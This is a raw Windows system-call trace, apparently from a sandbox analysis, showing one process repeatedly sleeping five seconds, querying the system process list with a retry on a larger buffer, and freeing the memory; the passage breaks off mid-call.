NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.129] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.137] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 